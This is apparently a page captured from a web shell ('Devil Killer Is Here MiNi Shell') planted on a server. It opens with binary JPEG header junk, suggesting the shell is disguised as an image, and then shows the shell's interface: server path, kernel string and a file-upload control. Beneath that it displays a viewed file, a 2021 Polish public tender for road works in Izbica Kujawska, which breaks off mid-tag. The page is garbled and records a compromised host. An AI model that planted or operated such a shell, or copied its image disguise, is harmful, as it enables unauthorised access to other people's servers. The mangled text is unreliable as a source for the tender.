JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211222/0032695401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa dróg gminnych na osiedlu Morele w Izbicy Kujawskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IZBICA KUJAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866850</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marszałka Pilsudskiego 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Izbica Kujawska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-865</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">542865009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@izbicakuj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.izbicakuj.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa dróg gminnych na osiedlu Morele w Izbicy Kujawskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e3dc0fd7-630c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00326954</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004227/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Rozbudowa dróg gminnych na osiedlu Morele w Izbicy kujawskiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.izbicakuj.pl/index.php?id=23 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu:<br/>• miniPortalu który dostępny jest pod adresem: https://miniportal.uzp.gov.pl,<br/>• ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal lub<br/>• poczty elektronicznej przetargi@izbicakuj.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKLP.271.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozbudowa dróg gminnych na osiedlu Morele w Izbicy Kujawskiej.<br/>•	Zakres rzeczowy obejmuje:<br/>•	rozebranie nawierzchni bitumicznej oraz chodników na skrzyżowaniach oraz wzdłuż projektowanego układu,<br/>•	korytowanie pod konstrukcję nawierzchni,<br/>•	wykonanie kanalizacji deszczowej i drenu,<br/>•	wbudowanie warstw podbudowy pomocniczej i zasadniczej,<br/>•	ustawienie krawężników, obrzeży, oporników,<br/>•	regulacja wysokościowa wpustów, skrzynek zaworów, włazów nastudziennych,<br/>•	ułożenie warstw bitumicznych nawierzchni,<br/>•	ułożenie nawierzchni z kostki brukowej na skrzyżowaniach,<br/>•	ułożenie nawierzchni ścieżki rowerowej oraz chodników i zjazdów z kostki brukowej,<br/>•	humusowanie terenów w około chodnika na dz. 885.<br/><br/>•	Charakterystyka projektowanej drogi:<br/>•	kategoria dróg: gminne,<br/>•	klasa drogi: dojazdowe (D),<br/>•	kategoria ruchu: KR1,<br/>•	długość:<br/>- dg 191728C – 476 mb,<br/>- dg 191729C – 221 mb,<br/>- dg 191726C – 229 mb<br/>•	szerokość nawierzchni dróg: 5,00 m,<br/>•	szerokość pasa ruchu: 2,50 m,<br/>•	przekrój jezdni: 1x2,<br/>•	rodzaj nawierzchni – beton asfaltowy,<br/>•	rodzaj chodnika: jednostronny i obustronny.<br/><br/>•	Projektowana konstrukcja:<br/>3.1. Konstrukcja jezdni:<br/>•	warstwa ścieralna, beton asfaltowy AC11S 50/70, grub. 4 cm,<br/>•	warstwa wiążąca, beton asfaltowy AC11W 50/70, grub. 4 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 20 cm,<br/>•	podbudowa pomocnicza, mieszanka związana Rm=2,5 Mpa grub. 20 cm,<br/>•	warstwa wzmacniająca, mieszanka związana Rm=1,5 Mpa grub. 12 cm,<br/>•	sprofilowane zagęszczone podłoże gruntowe.<br/><br/>3.2. Konstrukcja jezdni na skrzyżowaniach wyniesionych:<br/>•	warstwa ścieralna, drobnowymiarowa kostka brukowa betonowa typu Holand koloru czerwonego, grub. 8 cm,<br/>•	podsypka cem.-piask. 1:4, grub. 3-5 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 20 cm,<br/>•	podbudowa pomocnicza, mieszanka związana Rm=2,5 Mpa grub. 20 cm,<br/>•	warstwa wzmacniająca, mieszanka związana Rm=1,5 Mpa grub. 12 cm,<br/>•	sprofilowane zagęszczone podłoże gruntowe,<br/>Projektowane skrzyżowania wyniesione należy wykonać w taki sposób, aby wyniesienie obejmowało również przejścia dla pieszych. Przed przejściami projektuje się rampy o dł. 1,0 m. Wyniesienie projektuje się na wysokość 12 cm, a zatem na równi z górną płaszczyzną krawężnika. Początek rampy należy obramować opornikiem betonowym 12x25x100 cm na ławie betonowej.<br/><br/>3.3. Konstrukcja ścieżki pieszo-rowerowej:<br/>•	warstwa ścieralna, drobnowymiarowa kostka brukowa betonowa typu holand bezfazowa koloru czerwonego, grub. 6 cm,<br/>•	podsypka cem.-piask. 1:4, grub. 3 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 10 cm,<br/>•	warstwa odcinająca, piasek, grub 10 cm,<br/>•	sprofilowane zagęszczone podłoże gruntowe.<br/>Ścieżkę należy obramować krawężnikiem drogowym betonowym 15x30x100 cm od strony jezdni, natomiast od strony pola obrzeżem betonowym 8x30x100 cm. Prefabrykaty należy ustawić na ławie betonowej z oporem.<br/><br/>3.4. Konstrukcja chodnika:<br/>•	warstwa ścieralna, drobnowymiarowa kostka brukowa betonowa typu Holand koloru szarego, grub. 6 cm,<br/>•	podsypka cem-piask. 1:4, grub. 3 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 10 cm,<br/>•	warstwa odcinająca, piasek, grub. 10 cm,<br/>•	sprofilowane zagęszczone podłoże gruntowe.<br/>Chodnik należy obramować krawężnikiem drogowym betonowym 15x30x100 cm od strony jezdni, natomiast od strony pola obrzeżem betonowym 8x30x100 cm. Prefabrykaty należy ustawić na ławie betonowej z oporem.<br/><br/>3.5. Konstrukcja zjazdów:<br/>•	warstwa ścieralna, drobnowymiarowa kostka brukowa betonowa typu Holand koloru szarego, grub. 8 cm,<br/>•	podsypka cem-piask. 1:4, grub. 3 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 20 cm,<br/>•	warstwa odcinająca, piasek, grub. 10 cm,<br/>•	sprofilowane zagęszczone podłoże gruntowe.<br/>Zjazdy należy obramować od strony jezdni krawężnikiem wtopionym 15x22x100 cm na ławie betonowej z oporem, od strony bram opornikiem betonowym 12x25x100 cm na ławie betonowej z oporem, natomiast oddzielenie od chodników należy wykonać za pomocą obrzeża betonowego 8x30x100 cm na ławie betonowej.<br/><br/>•	Odwodnienie jezdni zrealizowane jest powierzchniowo na pomocą spadków podłużnych i poprzecznych do projektowanej kanalizacji deszczowej.<br/>Dodatkowo, aby zabezpieczyć nawierzchnię jezdni przed sączeniami śródwarstwowymi wody w części południowo-zachodniej projektuje się dren pod chodnikiem – zgodnie z częścią rysunkową. Ujście rur drenarskich należy zrealizować do wpustów ulicznych poprzez nawiertkę.<br/><br/>•	Kanalizację deszczową projektuje się wykonać z rur kanalizacyjnych grawitacyjnych PVC np. Wavin, Kaczmarek klasy S z kielichem Dn 315.<br/><br/>•	Na kanałach projektuje się studnie kanalizacyjne spełniające wymogi normy PN-B-10729. Projektuje się studnie kanalizacyjne rewizyjne i połączeniowe PVC Dn 1000 TEGRA np. Wavin. Studnie te można zamienić na studnie z kręgów betonowych izolowanych z płytą nastudzienną i włazem żeliwnym Dn 600 typu ciężkiego.<br/>Studnie wyposażyć we włazy z żeliwa sferoidalnego klasy D 400 z wkładką tłumiącą.<br/><br/>•	Wody opadowe z powierzchni utwardzonych spływać będą do projektowanej kanalizacji żeliwnymi wpustami ulicznymi klasy C wg PN-88/H-74080/04 osadzonymi na studzienkach betonowych Ø 500mm.<br/><br/>•	Przedmiot zamówienia obejmuje też przebudowę skrzyżowania polegającą na zmianie jego geometrii oraz wykonaniu nowej nawierzchni bitumicznej. <br/>Zakres rzeczowy obejmuje:<br/>•	rozebranie istniejącej nawierzchni bitumicznej,<br/>•	konserwacja przepustu,<br/>•	wbudowanie warstw konstrukcyjnych nawierzchni,<br/>•	ułożenie nawierzchni bitumicznej,<br/>•	wbudowanie umocnionego pobocza.<br/><br/>•	Konstrukcja jezdni:<br/>•	warstwa ścieralna, beton asfaltowy AC11S 50/70, grub. 4 cm,<br/>•	warstwa wiążąca, beton asfaltowy AC11W 50/70, grub. 4 cm,<br/>•	podbudowa zasadnicza, mieszanka niezwiązana C90/3 0/31,5, grub. 25 cm,<br/>•	warstwa wzmacniająca, mieszanka związana C1, 5/2, grub. 10 cm,<br/>•	sprofilowanie zagęszczone podłoże gruntowe.<br/><br/>•	Odwodnienie jezdni zrealizowane jest powierzchniowo za pomocą spadków podłużnych i poprzecznych na przyległy teren.<br/><br/>•	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do:<br/>•	wprowadzenia oznakowania tymczasowych organizacji ruchu w miejscu i na czas prowadzenia robót zgodnie z zatwierdzonymi projektami;<br/>•	wprowadzenia stałych organizacji ruchu zgodnie z zatwierdzonymi projektami.<br/><br/>•	W obrębie planowanego zadania zlokalizowane jest stanowisko archeologiczne nr 462 na obszarze AZP 52-45 (nr 11 w m. Izbica Kujawska), które jest ujęte jako zabytek archeologiczny w wojewódzkiej ewidencji zabytków. Skutkiem powyższego ww. zabytek podlega ochronie prawnej na podstawie art. 6 ust. 1 pkt 3 lit. „a”, art. 7 ust. 4 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2018 r., poz. 2096 z późn. zm.). W przypadku prowadzenia prac ziemnych w obrębie stanowiska archeologicznego zapewnić inwestorski nadzór archeologiczny.<br/>W trakcie prowadzenia robót należy postępować zgodnie z zapisami określonymi w Decyzji Nr ZAR/68/2019 z dnia 9 grudnia 2019 r. Kujawsko-Pomorskiego Wojewódzkiego Konserwatora Zabytków w Toruniu. <br/><br/><br/>Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa – załącznik nr 4, 5 , 6 do SWZ<br/>Zamawiający dołożył wszelkich starań, aby w opisie przedmiotu zamówienia nie znalazła się żadna nazwa handlowa firmy, towaru lub produktu. Jeśli w dokumentach zamówienia, wskazana jest nazwa handlowa firmy, towaru lub produktu, ma ona wyłącznie charakter informacyjny. Wszystkie dostarczone elementy wyposażenia składające się na przedmiot umowy muszą zawierać odpowiednie, aktualne i wymagane certyfikaty/świadectwa jakości/atesty/deklaracje zgodności lub oznaczenia, informujące o dopuszczeniu do sprzedaży oraz spełniać wszelkie wymogi norm określonych obowiązującym prawem jeśli takie są wymagane. Podstawą do określenia ceny, ryczałtowej za przedmiot zamówienia jest dokumentacja projektowa oraz ilości robót wynikające z tej dokumentacji. <br/>Szczegółowe obowiązki wykonawcy w zakresie realizacji przedmiotu zamówienia określają projektowane postanowienia umowy w sprawie zamówienia publicznego – załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów<br/>oceny ofert określonych w Specyfikacji Warunków Zamówienia.<br/>2. Kryteriami oceny ofert jest cena i okres gwarancji i rękojmi3. Przy wyborze najkorzystniejszej oferty<br/>Zamawiający będzie się kierował niżej podanymi kryteriami i<br/>ich wagą:<br/>L.p Kryterium Znaczenie procentowe kryterium<br/>1 Cena oferty 60%<br/>2 Okres gwarancji i rękojmi 40%<br/>Łącznie 100%<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich<br/>kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po<br/>przecinku.<br/>Przyznanie ilości punktów ofertom będzie odbywać się wg poniższych zasad:<br/>Nr kryterium Wzór<br/>1 Cena - C<br/>Liczba punktów = ( Cmin/Cof) x waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof- cena podana w ofercie<br/>2 Okres gwarancji i rękojmi - G<br/>Liczba punktów = ( Gof/Gmax) x waga<br/>gdzie:<br/>- Gof - podany w ofercie okres gwarancji i rękojmi<br/>- Gmax - najwyższy spośród wszystkich ofert okres gwarancji i rękojmi<br/>Punkty za kryterium okres gwarancji i rękojmi zostaną przyznane Wykonawcy na podstawie<br/>oświadczenia dotyczącego ilości miesięcy określonej w formularzu ofertowym przewidziany na okres<br/>gwarancji dla przedmiotu zamówienia w przedziale od 36 do 72 miesięcy.<br/>W trakcie oceny poszczególnych ofert, zostaną wyliczone punkty wg poniższego wzoru:<br/>Px= Cx + Gx<br/>Px Łączna ilość punktów uzyskanych przez badana ofertę<br/>x nr badanej oferty<br/>W toku oceny ofert Zamawiający zastosuje zaokrąglenie wszystkich wyników do dwóch miejsc po<br/>przecinku.<br/>4. Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w<br/>oparciu o ustalone kryterium – „cena” oraz „ okres gwarancji i rękojmi ”) zostanie uznana za<br/>najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane, zgodnie z ilością uzyskanych punktów.5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie PZP oraz w SWZ i zostanie oceniona jako najkorzystniejsza<br/>w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty<br/>Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia<br/>stanowi załącznik nr 2 do SWZ. W przepadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie składa każdy z Wykonawców.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu z postępowania stanowiące załącznik nr 2 do SWZ składa każdy z Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP nazwa Zamawiającego: jr60fdx35d/skrytka i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 